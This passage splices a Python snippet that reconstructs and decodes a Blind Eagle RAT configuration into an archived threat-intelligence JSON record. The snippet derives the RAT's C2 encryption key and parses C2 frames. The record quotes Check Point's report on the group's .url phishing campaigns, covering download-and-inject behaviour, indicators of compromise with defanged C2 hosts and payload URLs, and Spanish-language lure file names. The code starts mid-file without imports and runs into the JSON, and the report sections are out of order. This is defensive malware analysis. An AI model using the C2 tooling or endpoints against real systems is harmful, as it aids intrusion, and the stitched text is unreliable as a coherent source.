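# Base64 prefix exactly as printed in the report (the page truncates it).
PAGE_B64_PREFIX = ('CmIKIXJlcHVibGljYWRvbWluaWNhMjAyNS5pcC1kZG5zLmNvbRD56wEY'
                   'BSIIbW9ubzEyMzQyCnNvY2lhbGlzbW9CElNwb25zb3JzaGlwVGltZW')
# Salt from the report; the password is the mutex name mono1234.
RAT_SALT = bytes([1, 2, 23, 234, 37, 48, 134, 63, 248, 4])

def read_varint(buf, pos):
    '''Read one base-128 varint at pos; return (value, next_pos).'''
    value, shift = 0, 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7
        if shift > 63:
            raise ValueError('varint longer than 10 bytes')

def decode_message(buf):
    '''Decode protobuf wire format with no .proto into {field_number: value}.
    Printable-ASCII length-delimited fields become str, others nested maps.'''
    out, pos = {}, 0
    while pos < len(buf):
        tag, pos = read_varint(buf, pos)
        field, wire_type = tag >> 3, tag & 7
        if wire_type == 0:                               # varint
            out[field], pos = read_varint(buf, pos)
        elif wire_type in (1, 5):                        # fixed 64/32-bit
            fmt, width = ('<Q', 8) if wire_type == 1 else ('<I', 4)
            out[field] = struct.unpack_from(fmt, buf, pos)[0]
            pos += width
        elif wire_type == 2:                             # length-delimited
            length, pos = read_varint(buf, pos)
            chunk = buf[pos:pos + length]
            if len(chunk) != length:
                raise ValueError('truncated length-delimited field')
            pos += length
            if chunk and all(0x20 <= c < 0x7F for c in chunk):
                out[field] = chunk.decode('ascii')
            else:
                out[field] = decode_message(chunk)
        else:                                            # groups: unsupported
            raise ValueError('unsupported wire type %d' % wire_type)
    return out

def _ld(field, payload):
    '''Encode a length-delimited field (enough for field < 16, len < 128).'''
    return bytes([(field << 3) | 2, len(payload)]) + payload

def _vi(field, value):
    '''Encode a varint field (wire type 0).'''
    body = bytearray()
    while value > 0x7F:
        body.append((value & 0x7F) | 0x80)
        value >>= 7
    body.append(value)
    return bytes([field << 3]) + bytes(body)

# Constructed sample: the socialismo config re-encoded from the decoded values
# the report prints (its own base64 is cut off before the last field).
CONFIG_BLOB = _ld(1, _ld(1, b'republicadominica2025.ip-ddns.com') + _vi(2, 30201)
                  + _vi(3, 5) + _ld(4, b'mono1234') + _ld(6, b'socialismo')
                  + _ld(8, b'SponsorshipTimeout') + _ld(12, b'NextActivator'))

def config_base64():
    '''Base64 of the sample, comparable with the prefix printed on the page.'''
    return base64.b64encode(CONFIG_BLOB).decode('ascii')

def rat_config(blob=CONFIG_BLOB):
    '''Outer field 1 wraps the settings message; return that inner map.'''
    return decode_message(blob)[1]

def derive_network_key(mutex_name, key_len=32, iterations=1000):
    '''Rfc2898DeriveBytes(password, salt) with .NET defaults is PBKDF2 over
    HMAC-SHA1, 1000 iterations, password as UTF-8 bytes (assumed here).'''
    return hashlib.pbkdf2_hmac('sha1', mutex_name.encode('utf-8'),
                               RAT_SALT, iterations, key_len)

def split_frame(stream):
    '''A C2 reply is a DWORD size then that many AES-encrypted bytes. Return
    (ciphertext, leftover); refuse a short read so a partial TCP segment is
    never handed to the decryptor.'''
    if len(stream) < 4:
        raise ValueError('need the 4-byte length prefix first')
    size = struct.unpack_from('<I', stream, 0)[0]
    if len(stream) < 4 + size:
        raise ValueError('incomplete frame: %d of %d bytes' % (len(stream), 4 + size))
    return bytes(stream[4:4 + size]), bytes(stream[4 + size:])
```

The decoder is schema-less: a length-delimited field whose bytes are all printable ASCII is treated as a string and anything else as a nested message, which is enough for this config because the only nested message begins with a tag byte (0x0A) that is not printable. rat_config() returns {1: 'republicadominica2025.ip-ddns.com', 2: 30201, 3: 5, 4: 'mono1234', 6: 'socialismo', 8: 'SponsorshipTimeout', 12: 'NextActivator'}, and config_base64() starts with the prefix printed on the page, which is the check that the reconstruction matches the sample's real encoding.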
So far, Blind Eagle has used this RAT as a downloader: it receives a URL, downloads the file, and injects it into either MSBuild.exe or InstallUtil.exe.\r\nFigure 17 – Random choice of process to be injected.\r\nAlthough this download-and-inject command is the one Blind Eagle uses most, the .NET RAT also contains other functionality, such as dropping the next payload to disk, maintaining persistence via scheduled tasks, and executing PowerShell scripts.\r\nFigure 18 – Powershell file execution.\r\nConclusion\r\nBlind Eagle remains one of the most active and dangerous threat actors in Latin America, with a particular focus on Colombia’s public and private sectors. The group’s scale and persistence are evident, with over 1,600 infections recorded from a single campaign. The group has long been suspected of originating in Latin America, and the UTC-5 operating timezone confirmed here further narrows its likely base of operations to several South American countries.\r\nDespite Microsoft’s release of a patch for CVE-2024-43451 on November 12, 2024, Blind Eagle adapted quickly, introducing a variant of the “exploit” just six days later. This rapid response highlights the group’s technical expertise, adaptability, and relentless pursuit of new attack methods. By incorporating malicious .url files into its arsenal, Blind Eagle continues to refine its tactics, ensuring its malware distribution remains effective against evolving security defenses.\r\nA key factor in its success is its abuse of legitimate file-sharing platforms, including Google Drive, Dropbox, Bitbucket, and GitHub, which lets it bypass traditional security measures and distribute malware stealthily. 
Additionally, its use of underground crimeware tools such as Remcos RAT, HeartCrypt, and PureCrypter reinforces its deep ties to the cybercriminal ecosystem, giving it access to sophisticated evasion techniques and persistent access methods.\r\nBlind Eagle’s rapid evolution, effective social engineering, and focus on both public and private sector entities make it a critical cybersecurity threat. Mitigating its impact requires proactive threat intelligence, advanced security defenses, and continuous monitoring. Organizations must remain vigilant against phishing campaigns, file-based malware delivery, and unconventional attack techniques to stay ahead of this ever-adapting adversary.\r\nProtections\r\nCheck Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file types, and operating systems and protect against the attacks and threats described in this report.\r\nExploit.Wins.CVE-2024-43451.ta.A\r\nInfostealer.Win.Generic.F\r\nInjector.Win.RunPE.A\r\nInfostealer.Win.PasswordStealer.A\r\nTrojan.Win.Unpacme.gl.I\r\nExploit.Win.UnDefender.A\r\nPacker.Win.VBNetCrypter.H\r\nPacker.Win.VBNetCrypter.E\r\nPacker.Win.DotNetCrypter.G\r\nTrojan.Win.Benjaminbo_test.gl.A\r\nbehavioral.win.suspautorun.a\r\nbehavioral.win.imagemodification.g\r\nIndicators of Compromise\r\nStage 1 – ITW Endpoints:\r\ndrive.usercontent[.]google[.]com/download?id=1CZcgN1kxz9kSNgscR9qgiOAERo-w-rTa\u0026export=download\r\ndrive.usercontent[.]google[.]com/download?id=1PZ2Ndi-GT-oQHlobFIdDJoSDSXkJvECV\u0026export=download\r\ndrive.usercontent[.]google[.]com/download?id=1R9MR64hy-dQelTZMPtsrSXLWObFt7mf2\u0026export=download\r\nStage 1 – .url files:\r\n1d1e007a9d8939bee7a0333522cc4f7480d448cc\r\n133bc4304057317b0b93f5ff44f20d153b985b50\r\n1fcc44d3b20381acce66f5634743917e8f22dae7\r\na0338654304b6f824bdc39bbb482a0e114f8a3a1\r\nStage 2 – 
ITW Endpoints:\r\n62.60.226[.]64/file/1374_2790.exe\r\n62.60.226[.]64/file/3819_5987.exe\r\n62.60.226[.]64/file/4025_3980.exe\r\n62.60.226[.]64/file/9451_1380.exe\r\nStage 2 – Payloads:\r\n07647f0eddf46d19e0864624b22236b2cdf561a1\r\n08daf84d9c2e9c51f64e076e7611601c29f68e90\r\n83c851f265f6d7dc9436890009822f0c2d4ba50a\r\n33ddaedc98991435f740f7a5a8a931a8cadd5391\r\nStage 2 – C\u0026C:\r\nrepublicadominica2025[.]ip-ddns[.]com\r\nStage 3 – ITW Endpoint:\r\nraw.githubusercontent[.]com/Oscarito20222/file/refs/heads/main/redtube.exe\r\nStage 3 – Remcos:\r\n758c73ab9706ae6977f9b4601c20b3667836d3ef\r\nStage 3 – Remcos C\u0026C:\r\nelyeso.ip-ddns[.]com:30204\r\nSource: https://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\n.url lure file names used in the campaigns, with English translations:\r\n[Filename] en virtud del artículo 220 de la Ley colombiana/Juzgados de Ejecución De Penas y Medidas De Seguridad.url\r\n[English] \"By virtue of Article 220 of Colombian Law / Courts of Execution of Sentences and Security Measures.\"\r\n[Filename] COMUNICADO N° 00239948 PROFERIDO PENAL 00028483 28 DE NOVIEMBRE/OFICIO N° 00239948 PROFERIDO PENAL 00028483 28 DE NOVIEMBRE.url\r\n[English] \"Communication No. 00239948 issued Criminal 00028483 November 28 / Official Letter No. 00239948 issued Criminal 00028483 November 28.\"\r\n[Filename] Oficio Tutelar 0439594-Proceso N° 03948939-002024.url\r\n[English] \"Protective Order 0439594 - Case No. 03948939-002024.\"\r\n[Filename] Juzgados de ejecución de sentencias de bogotá con función de conocimiento programó diligencia de CONTINUACIÓN JUICIO ORAL REFERENCIA.url\r\n[English] \"Courts of sentence execution in Bogotá with knowledge function scheduled a hearing for the continuation of the oral trial in reference.\"\r\n[Filename] NOTIFICACIÓN_AUDIENCIA_TOMA_DE_MUESTRA_QUE_INVOLUCREN_IMPUTADO.url\r\n[English] \"Notification of hearing for the taking of samples involving the defendant.\"\r\n[Filename] QUERELLA_JUDICIAL_No7254178000020150023000_Juzgado 9 Municipal de Pequeñas Causas Laborales de Bogotá.url\r\n[English] \"Judicial Complaint No. 7254178000020150023000, 9th Municipal Court of Small Labor Causes of Bogotá.\"\r\n[Filename] este despacho le informa que deberá comparecer ante el Juzgado Penal (6to) del Circuito de Bogot.url\r\n[English] \"This office informs you that you must appear before the 6th Criminal Court of the Circuit of Bogotá.\"\r\nWhile operating with this specific malicious file type for over two months, the APT group rotated through more than ten different C\u0026Cs (Command and Control servers) for its final stage payload. The attack chain has some small variations, but the .url files are always part of the initial stage. 
\r\nCampaigns ‘socialismo’ \u0026 ‘miami’ – January 21-22, 2025\r\nDuring the campaigns that took place around January 21 and 22, 2025, the APT group distributed multiple .url files via email through possibly compromised Google Drive accounts.",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/"
	],
	"report_names": [
		"blind-eagle-and-justice-for-all"
	],
	"threat_actors": [
		{
			"id": "98b22fd7-bf1b-41a6-b51c-0e33a0ffd813",
			"created_at": "2022-10-25T15:50:23.688973Z",
			"updated_at": "2026-04-10T02:00:05.390055Z",
			"deleted_at": null,
			"main_name": "APT-C-36",
			"aliases": [
				"APT-C-36",
				"Blind Eagle"
			],
			"source_name": "MITRE:APT-C-36",
			"tools": [
				"Imminent Monitor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "be597b07-0cde-47bc-80c3-790a8df34af4",
			"created_at": "2022-10-25T16:07:23.407484Z",
			"updated_at": "2026-04-10T02:00:04.58656Z",
			"deleted_at": null,
			"main_name": "Blind Eagle",
			"aliases": [
				"APT-C-36",
				"APT-Q-98",
				"AguilaCiega",
				"G0099"
			],
			"source_name": "ETDA:Blind Eagle",
			"tools": [
				"AsyncRAT",
				"BitRAT",
				"Bladabindi",
				"BlotchyQuasar",
				"Imminent Monitor",
				"Imminent Monitor RAT",
				"Jorik",
				"LimeRAT",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"Socmer",
				"Warzone",
				"Warzone RAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "dbcd2cc1-1adb-43cf-b175-a3ef4ee0d15e",
			"created_at": "2024-11-16T02:00:03.808384Z",
			"updated_at": "2026-04-10T02:00:03.767693Z",
			"deleted_at": null,
			"main_name": "UAC-0194",
			"aliases": [],
			"source_name": "MISPGALAXY:UAC-0194",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bd43391b-b835-4cb3-839a-d830aa1a3410",
			"created_at": "2023-01-06T13:46:38.925525Z",
			"updated_at": "2026-04-10T02:00:03.147197Z",
			"deleted_at": null,
			"main_name": "APT-C-36",
			"aliases": [
				"Blind Eagle"
			],
			"source_name": "MISPGALAXY:APT-C-36",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434806,
	"ts_updated_at": 1775826746,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6443e6d70d7f834d28ebd54745fadb7ba6a297b8.pdf",
		"text": "https://archive.orkl.eu/6443e6d70d7f834d28ebd54745fadb7ba6a297b8.txt",
		"img": "https://archive.orkl.eu/6443e6d70d7f834d28ebd54745fadb7ba6a297b8.jpg"
	}
}